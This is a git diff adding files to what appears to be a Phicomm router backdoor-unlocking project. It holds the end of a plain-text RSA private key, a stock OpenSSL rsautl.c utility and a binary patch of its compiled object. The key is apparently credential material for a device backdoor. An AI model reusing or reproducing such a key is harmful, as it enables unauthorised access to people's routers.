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
+-----END RSA PRIVATE KEY-----
+
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/rsautl.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/rsautl.c
new file mode 100644
index 0000000..0030aca
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/rsautl.c
@@ -0,0 +1,370 @@
+/* rsautl.c */
+/*
+ * Written by Dr Stephen N Henson (steve@openssl.org) for the OpenSSL project
+ * 2000.
+ */
+/* ====================================================================
+ * Copyright (c) 2000 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include <openssl/opensslconf.h>
+#ifndef OPENSSL_NO_RSA
+
+# include "apps.h"
+# include <string.h>
+# include <openssl/err.h>
+# include <openssl/pem.h>
+# include <openssl/rsa.h>
+
+# define RSA_SIGN        1
+# define RSA_VERIFY      2
+# define RSA_ENCRYPT     3
+# define RSA_DECRYPT     4
+
+# define KEY_PRIVKEY     1
+# define KEY_PUBKEY      2
+# define KEY_CERT        3
+
+static void usage(void);
+
+# undef PROG
+
+# define PROG rsautl_main
+
+int MAIN(int argc, char **);
+
+int MAIN(int argc, char **argv)
+{
+    ENGINE *e = NULL;
+    BIO *in = NULL, *out = NULL;
+    char *infile = NULL, *outfile = NULL;
+# ifndef OPENSSL_NO_ENGINE
+    char *engine = NULL;
+# endif
+    char *keyfile = NULL;
+    char rsa_mode = RSA_VERIFY, key_type = KEY_PRIVKEY;
+    int keyform = FORMAT_PEM;
+    char need_priv = 0, badarg = 0, rev = 0;
+    char hexdump = 0, asn1parse = 0;
+    X509 *x;
+    EVP_PKEY *pkey = NULL;
+    RSA *rsa = NULL;
+    unsigned char *rsa_in = NULL, *rsa_out = NULL, pad;
+    char *passargin = NULL, *passin = NULL;
+    int rsa_inlen, rsa_outlen = 0;
+    int keysize;
+
+    int ret = 1;
+
+    argc--;
+    argv++;
+
+    if (!bio_err)
+        bio_err = BIO_new_fp(stderr, BIO_NOCLOSE);
+
+    if (!load_config(bio_err, NULL))
+        goto end;
+    ERR_load_crypto_strings();
+    OpenSSL_add_all_algorithms();
+    pad = RSA_PKCS1_PADDING;
+
+    while (argc >= 1) {
+        if (!strcmp(*argv, "-in")) {
+            if (--argc < 1)
+                badarg = 1;
+            else
+                infile = *(++argv);
+        } else if (!strcmp(*argv, "-out")) {
+            if (--argc < 1)
+                badarg = 1;
+            else
+                outfile = *(++argv);
+        } else if (!strcmp(*argv, "-inkey")) {
+            if (--argc < 1)
+                badarg = 1;
+            else
+                keyfile = *(++argv);
+        } else if (!strcmp(*argv, "-passin")) {
+            if (--argc < 1)
+                badarg = 1;
+            else
+                passargin = *(++argv);
+        } else if (strcmp(*argv, "-keyform") == 0) {
+            if (--argc < 1)
+                badarg = 1;
+            else
+                keyform = str2fmt(*(++argv));
+# ifndef OPENSSL_NO_ENGINE
+        } else if (!strcmp(*argv, "-engine")) {
+            if (--argc < 1)
+                badarg = 1;
+            else
+                engine = *(++argv);
+# endif
+        } else if (!strcmp(*argv, "-pubin")) {
+            key_type = KEY_PUBKEY;
+        } else if (!strcmp(*argv, "-certin")) {
+            key_type = KEY_CERT;
+        } else if (!strcmp(*argv, "-asn1parse"))
+            asn1parse = 1;
+        else if (!strcmp(*argv, "-hexdump"))
+            hexdump = 1;
+        else if (!strcmp(*argv, "-raw"))
+            pad = RSA_NO_PADDING;
+        else if (!strcmp(*argv, "-oaep"))
+            pad = RSA_PKCS1_OAEP_PADDING;
+        else if (!strcmp(*argv, "-ssl"))
+            pad = RSA_SSLV23_PADDING;
+        else if (!strcmp(*argv, "-pkcs"))
+            pad = RSA_PKCS1_PADDING;
+        else if (!strcmp(*argv, "-x931"))
+            pad = RSA_X931_PADDING;
+        else if (!strcmp(*argv, "-sign")) {
+            rsa_mode = RSA_SIGN;
+            need_priv = 1;
+        } else if (!strcmp(*argv, "-verify"))
+            rsa_mode = RSA_VERIFY;
+        else if (!strcmp(*argv, "-rev"))
+            rev = 1;
+        else if (!strcmp(*argv, "-encrypt"))
+            rsa_mode = RSA_ENCRYPT;
+        else if (!strcmp(*argv, "-decrypt")) {
+            rsa_mode = RSA_DECRYPT;
+            need_priv = 1;
+        } else
+            badarg = 1;
+        if (badarg) {
+            usage();
+            goto end;
+        }
+        argc--;
+        argv++;
+    }
+
+    if (need_priv && (key_type != KEY_PRIVKEY)) {
+        BIO_printf(bio_err, "A private key is needed for this operation\n");
+        goto end;
+    }
+# ifndef OPENSSL_NO_ENGINE
+    e = setup_engine(bio_err, engine, 0);
+# endif
+    if (!app_passwd(bio_err, passargin, NULL, &passin, NULL)) {
+        BIO_printf(bio_err, "Error getting password\n");
+        goto end;
+    }
+
+/* FIXME: seed PRNG only if needed */
+    app_RAND_load_file(NULL, bio_err, 0);
+
+    switch (key_type) {
+    case KEY_PRIVKEY:
+        pkey = load_key(bio_err, keyfile, keyform, 0,
+                        passin, e, "Private Key");
+        break;
+
+    case KEY_PUBKEY:
+        pkey = load_pubkey(bio_err, keyfile, keyform, 0,
+                           NULL, e, "Public Key");
+        break;
+
+    case KEY_CERT:
+        x = load_cert(bio_err, keyfile, keyform, NULL, e, "Certificate");
+        if (x) {
+            pkey = X509_get_pubkey(x);
+            X509_free(x);
+        }
+        break;
+    }
+
+    if (!pkey) {
+        return 1;
+    }
+
+    rsa = EVP_PKEY_get1_RSA(pkey);
+    EVP_PKEY_free(pkey);
+
+    if (!rsa) {
+        BIO_printf(bio_err, "Error getting RSA key\n");
+        ERR_print_errors(bio_err);
+        goto end;
+    }
+
+    if (infile) {
+        if (!(in = BIO_new_file(infile, "rb"))) {
+            BIO_printf(bio_err, "Error Reading Input File\n");
+            ERR_print_errors(bio_err);
+            goto end;
+        }
+    } else
+        in = BIO_new_fp(stdin, BIO_NOCLOSE);
+
+    if (outfile) {
+        if (!(out = BIO_new_file(outfile, "wb"))) {
+            BIO_printf(bio_err, "Error Reading Output File\n");
+            ERR_print_errors(bio_err);
+            goto end;
+        }
+    } else {
+        out = BIO_new_fp(stdout, BIO_NOCLOSE);
+# ifdef OPENSSL_SYS_VMS
+        {
+            BIO *tmpbio = BIO_new(BIO_f_linebuffer());
+            out = BIO_push(tmpbio, out);
+        }
+# endif
+    }
+
+    keysize = RSA_size(rsa);
+
+    rsa_in = OPENSSL_malloc(keysize * 2);
+    rsa_out = OPENSSL_malloc(keysize);
+
+    /* Read the input data */
+    rsa_inlen = BIO_read(in, rsa_in, keysize * 2);
+    if (rsa_inlen <= 0) {
+        BIO_printf(bio_err, "Error reading input Data\n");
+        exit(1);
+    }
+    if (rev) {
+        int i;
+        unsigned char ctmp;
+        for (i = 0; i < rsa_inlen / 2; i++) {
+            ctmp = rsa_in[i];
+            rsa_in[i] = rsa_in[rsa_inlen - 1 - i];
+            rsa_in[rsa_inlen - 1 - i] = ctmp;
+        }
+    }
+    switch (rsa_mode) {
+
+    case RSA_VERIFY:
+        rsa_outlen = RSA_public_decrypt(rsa_inlen, rsa_in, rsa_out, rsa, pad);
+        break;
+
+    case RSA_SIGN:
+        rsa_outlen =
+            RSA_private_encrypt(rsa_inlen, rsa_in, rsa_out, rsa, pad);
+        break;
+
+    case RSA_ENCRYPT:
+        rsa_outlen = RSA_public_encrypt(rsa_inlen, rsa_in, rsa_out, rsa, pad);
+        break;
+
+    case RSA_DECRYPT:
+        rsa_outlen =
+            RSA_private_decrypt(rsa_inlen, rsa_in, rsa_out, rsa, pad);
+        break;
+
+    }
+
+    if (rsa_outlen <= 0) {
+        BIO_printf(bio_err, "RSA operation error\n");
+        ERR_print_errors(bio_err);
+        goto end;
+    }
+    ret = 0;
+    if (asn1parse) {
+        if (!ASN1_parse_dump(out, rsa_out, rsa_outlen, 1, -1)) {
+            ERR_print_errors(bio_err);
+        }
+    } else if (hexdump)
+        BIO_dump(out, (char *)rsa_out, rsa_outlen);
+    else
+        BIO_write(out, rsa_out, rsa_outlen);
+ end:
+    RSA_free(rsa);
+    BIO_free(in);
+    BIO_free_all(out);
+    if (rsa_in)
+        OPENSSL_free(rsa_in);
+    if (rsa_out)
+        OPENSSL_free(rsa_out);
+    if (passin)
+        OPENSSL_free(passin);
+    return ret;
+}
+
+static void usage()
+{
+    BIO_printf(bio_err, "Usage: rsautl [options]\n");
+    BIO_printf(bio_err, "-in file        input file\n");
+    BIO_printf(bio_err, "-out file       output file\n");
+    BIO_printf(bio_err, "-inkey file     input key\n");
+    BIO_printf(bio_err, "-keyform arg    private key format - default PEM\n");
+    BIO_printf(bio_err, "-pubin          input is an RSA public\n");
+    BIO_printf(bio_err,
+               "-certin         input is a certificate carrying an RSA public key\n");
+    BIO_printf(bio_err, "-ssl            use SSL v2 padding\n");
+    BIO_printf(bio_err, "-raw            use no padding\n");
+    BIO_printf(bio_err,
+               "-pkcs           use PKCS#1 v1.5 padding (default)\n");
+    BIO_printf(bio_err, "-oaep           use PKCS#1 OAEP\n");
+    BIO_printf(bio_err, "-sign           sign with private key\n");
+    BIO_printf(bio_err, "-verify         verify with public key\n");
+    BIO_printf(bio_err, "-encrypt        encrypt with public key\n");
+    BIO_printf(bio_err, "-decrypt        decrypt with private key\n");
+    BIO_printf(bio_err, "-hexdump        hex dump output\n");
+# ifndef OPENSSL_NO_ENGINE
+    BIO_printf(bio_err,
+               "-engine e       use engine e, possibly a hardware device.\n");
+    BIO_printf(bio_err, "-passin arg    pass phrase source\n");
+# endif
+
+}
+
+#else                           /* !OPENSSL_NO_RSA */
+
+# if PEDANTIC
+static void *dummy = &dummy;
+# endif
+
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/rsautl.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/rsautl.o
new file mode 100644
index 0000000000000000000000000000000000000000..e845b20cd119f6d81b79b2fcce8add9c3e96b1a8
GIT binary patch
literal 11640
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
